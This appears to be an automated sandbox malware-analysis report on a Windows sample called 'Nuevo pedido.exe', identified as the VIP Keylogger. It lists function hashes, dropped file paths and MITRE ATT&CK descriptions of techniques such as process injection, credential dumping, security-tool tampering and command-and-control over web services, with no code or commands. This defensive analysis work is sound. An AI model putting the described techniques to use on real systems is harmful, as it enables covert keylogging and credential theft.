Instruction ID: 7c0698f3840a8923edb6f9ba6e9002c6bbf49b44065a1512c54ab2728fec5956
Opcode Fuzzy Hash: 14ac595f568c50eddeb3e63fe74a546c48a215b188ae584702354a32c1f29c28
Instruction Fuzzy Hash: 0121D43570A1599FCB15DF68E848AAF7BA5EB99310F048065F80A9B354C738CD61CBA0

Function 03054285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c47e8dc366dcaf1a5d4b4b6cca94c314ab02b2941ae579bdf296cd45e02f40a
Instruction ID: 78cd0a758e90e3e7b67e0809e7fb2a82c2506782091cfda95600c52bbeefb69c
Opcode Fuzzy Hash: 6c47e8dc366dcaf1a5d4b4b6cca94c314ab02b2941ae579bdf296cd45e02f40a
Instruction Fuzzy Hash: D431B378E11308DFCB04DFA9E59889DBBB2FF89305B2040A9E819AB324D735AD41CF11

Function 0305AEF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5465fa2bd616ab0cff072355ec077f34ba03005a8c779b21eaf797427a87857f
Instruction ID: 9708583e6cb8b0fe98f60d0c39444a453aa12846421486b45f36d47ffa07f733
Opcode Fuzzy Hash: 5465fa2bd616ab0cff072355ec077f34ba03005a8c779b21eaf797427a87857f
Instruction Fuzzy Hash: 9E218E76B01108ABCB15DE98D854ADEBBBAFF8C710F188165F915E7250DB719C10CBA0

Function 03059761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4658ca9b4e209d7e770ff5c6204b604207c0d18e08f9fa438a9ca6da2408e1b
Instruction ID: 9ae7cbb1cac5762bc9469f3d0c5d855e360270f70c8bab37990120bc146f1189
Opcode Fuzzy Hash: c4658ca9b4e209d7e770ff5c6204b604207c0d18e08f9fa438a9ca6da2408e1b
Instruction Fuzzy Hash: 33216B34E01248DFCB14CFA5E554AEEBFB6EF49201F1880A5E815A6294DB389941CB20

Function 0305F8EA Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94baa6f5d020ed785627962eebe2b82115cf6f796ca9f32db025a5953e21540e
Instruction ID: a3f0eefb3dbe0b822f74aa35c1c3093f2cc9bda63c3559a0c6ae1d404b4423cd
Opcode Fuzzy Hash: 94baa6f5d020ed785627962eebe2b82115cf6f796ca9f32db025a5953e21540e
Instruction Fuzzy Hash: CE31E474E06319DFDB64DF64D9587AEBBF1EF49300F1044AAE80AAB250DB745A81CF12

Function 03056300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 883e1dc6d76d40beccbcbcb854b327150aac8895b105cf7285fccb4305994bcd
Instruction ID: a9171563002b633ded117af8fc9a8644599b338c3fc0d5b347d99a970fe86854
Opcode Fuzzy Hash: 883e1dc6d76d40beccbcbcb854b327150aac8895b105cf7285fccb4305994bcd
Instruction Fuzzy Hash: 671121353066159FC7289B2AD45892FBBE6FFE96913494468E806CB364CF22DC0287A4

Function 030527F0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0194ca638ac88f9989a1772ef69aa14eaaa54cea7f27464c9b3c712eedaf86e
Instruction ID: 3292982a8158a707f42d527e09fb05df078852cda34fd43abfe862e2f995291c
Opcode Fuzzy Hash: f0194ca638ac88f9989a1772ef69aa14eaaa54cea7f27464c9b3c712eedaf86e
Instruction Fuzzy Hash: E2211074C062099FCF51EFA9D8445EEBBF8FF09210F14456AE809B3210EB301A95CBA1

Function 03055E98 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d8d7bfd4d9da69f4f492302787d0f391d80113f8a26ea8b0e8297a5fb47c39
Instruction ID: 65992b546cfd70dc4ad86566948a5720c2bbfd41e785800c24fc7482dbf6581d
Opcode Fuzzy Hash: e1d8d7bfd4d9da69f4f492302787d0f391d80113f8a26ea8b0e8297a5fb47c39
Instruction Fuzzy Hash: 3F01F532B052546FDB29DEA49C006AF7FA7DBCE650B0C8016FD06DB284DB318C218794

Function 0175D113 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138128139.000000000175D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_175d000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 22c2811c9e2d1388dca59767daa5c0c107b9131c3c0ebc664efa26780294a3a1
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: E411BB75504280CFDB12CF58D9C4B15FFA1FB84314F24C6AADC094B266C37AD44ACB61

Function 0305E8E8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4cf194b247385f352b2a77f71c74dec2a4ee36932bdbb99965c62095da9a8d
Instruction ID: c605b694317cac40bcf7ba6703f0667d2298baa64269a1a786d60e489efd3397
Opcode Fuzzy Hash: 5f4cf194b247385f352b2a77f71c74dec2a4ee36932bdbb99965c62095da9a8d
Instruction Fuzzy Hash: F9111874E0530AAFDB45CFA8E8489AEBBB0FB89300F048066ED54A3351E7755A56CF91

Function 0305ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0883ad2799c8b7ef7e748a9ac91802b80cb22e9c10a175133b5c4c7ee1cb927
Instruction ID: 88f94b2e4ba39f8ee32f75dbb74ef1d0134497ed4391f46c0c1237923c338a5f
Opcode Fuzzy Hash: a0883ad2799c8b7ef7e748a9ac91802b80cb22e9c10a175133b5c4c7ee1cb927
Instruction Fuzzy Hash: 5BF0FC313012104F8727DA2EA85462BBBDEEFC895530D857AFC09C7365DE21CC038390

Function 0174D01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4137925429.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_174d000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26eac5dbb7eb56daa689f73addda6a00a9c6da117bb203d69fee557cd0912290
Instruction ID: 0f78c9676105cbdf6ec3f46bc46a12119cbacdb523d71cde3097eac1673a29b0
Opcode Fuzzy Hash: 26eac5dbb7eb56daa689f73addda6a00a9c6da117bb203d69fee557cd0912290
Instruction Fuzzy Hash: DAF0F976600604AF97208F0AD885C23FBADEFD4670755C59AE84A4B612C771EC42CEA0

Function 0174D010 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4137925429.000000000174D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0174D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_174d000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb19cfec40bdcaf9cdd0098d79d12df74beff66b949dc5353fcc956852ad5fea
Instruction ID: 84491bf734af9e97b12c5166b70ed939bd2a578a3c70f7b58edfe5babc998e0e
Opcode Fuzzy Hash: eb19cfec40bdcaf9cdd0098d79d12df74beff66b949dc5353fcc956852ad5fea
Instruction Fuzzy Hash: 60F04975204680AFD325CF06C884C23BFB9EFCA6607198489E88A4B362C731FC42CF60

Function 03056739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6485e72d28dff5ccabcf04338b2e9628da9c6188d7390170787aef891d1b271
Instruction ID: 5f1b793cd108fb23e3e6fbf4369660182feb76b957255aa81e20f8a238aeb148
Opcode Fuzzy Hash: c6485e72d28dff5ccabcf04338b2e9628da9c6188d7390170787aef891d1b271
Instruction Fuzzy Hash: 4CE0C23540D3C90FCB57F334A85C46ABF3AEA92100B8CA9A1E0454E25FEE685C898361

Function 030528AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88ea88af84a76b284da58801d722157d1a8184abad584ac3b8637115233fb5c1
Instruction ID: 870290e1128b9c1b24056d0677a60b7491044ee3de6356d6b52413703dffe302
Opcode Fuzzy Hash: 88ea88af84a76b284da58801d722157d1a8184abad584ac3b8637115233fb5c1
Instruction Fuzzy Hash: 46E0C232D2022A578B00EAA5DC004EFBB38EE85620F804222D45433100EB30666982A2

Function 030528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b90cec97b59567ad27180a0c92bbc184b37bec50ac2ba69dd5e1176f4f1f1cac
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: b90cec97b59567ad27180a0c92bbc184b37bec50ac2ba69dd5e1176f4f1f1cac
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 0305D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059c494bce448d6bd8fad7211ec1835c5b741ddc8d7d9ae7a33db4872c95bbf6
Instruction ID: 752ee493f0290f7ae1d3bf0c9b23ef5e87fe546ba0070d9d5d828a1bf2915693
Opcode Fuzzy Hash: 059c494bce448d6bd8fad7211ec1835c5b741ddc8d7d9ae7a33db4872c95bbf6
Instruction Fuzzy Hash: 5DD0E234E00009CBCB30EFA8E4844DCBB70EF58322B10502AE825A3214CA3054A1CF20

Function 0305AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4156abc6c47f001589e8b8448d7c8e3920d965e8a566ee1b60533600ecb6bd
Instruction ID: 0fbf894c012bcd7e2d084b57a5af4f214cb54343bd16aa7117e47c8db51c9c36
Opcode Fuzzy Hash: 1c4156abc6c47f001589e8b8448d7c8e3920d965e8a566ee1b60533600ecb6bd
Instruction Fuzzy Hash: 9AD0173AB00008EFCB049F88EC408DDF7B6FB9C220B048016E911A3220C6319821CB60

Function 03056748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 528235e05172ca91cad8a33f114184db4a6d2ad76369878bf2d8eec83ef7f4c3
Instruction ID: 022d98202834dfcf5dfe18d68a26c7dbb9677e69d05a00284404046d16bffc98
Opcode Fuzzy Hash: 528235e05172ca91cad8a33f114184db4a6d2ad76369878bf2d8eec83ef7f4c3
Instruction Fuzzy Hash: 37C012341443194FC605F769FD49555B72EE6D0200740D520D0090665DDFBC5CC94690

Non-executed Functions

Function 03052A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xbq, xrefs: 03052BA4
Xbq, xrefs: 03052AD8
Xbq, xrefs: 03052A9E
Xbq, xrefs: 03052B57

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 737a5a62699307276d9dae865e690a100399aee4e63d8bb54ee05c9164379046
Instruction ID: 37e9443f1b29066e4d5b229718300da8e4b31f38185a2e33ee39fd5e6d15178d
Opcode Fuzzy Hash: 737a5a62699307276d9dae865e690a100399aee4e63d8bb54ee05c9164379046
Instruction Fuzzy Hash: 0F314575D062198BEFA4DF69898036FF6FEAF44300F1448B5D815A7355DB70CA81CB92

Function 03056920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 03056936
\;^q, xrefs: 03056952
\;^q, xrefs: 0305695E
\;^q, xrefs: 0305692C

Memory Dump Source

Source File: 0000000E.00000002.4138597862.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3050000_QGVhHsAOjb.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: ad221d0099d994521cef9a4d76d77075274d529bdb75f37d52a5d111f01bc18b
Instruction ID: daf2cc3aba7adb73866725781906df2b74dcc9fdb81da22aea115b98ce18a544
Opcode Fuzzy Hash: ad221d0099d994521cef9a4d76d77075274d529bdb75f37d52a5d111f01bc18b
Instruction Fuzzy Hash: EC0192317411088FCB64CE2CC54492AF3EEAF88B607695869F846CB3B4DF22DC418741

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nuevo pedido.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo pedido.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QGVhHsAOjb.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qjtqfyh.skt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aimco0bs.jjr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tryn3kff.fcu.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ueetucie.go3.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwjuacuo.3hg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz5oc35j.sfw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ycwutfrw.5tb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zm4ctvok.ils.ps1

Windows Analysis Report
Nuevo pedido.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

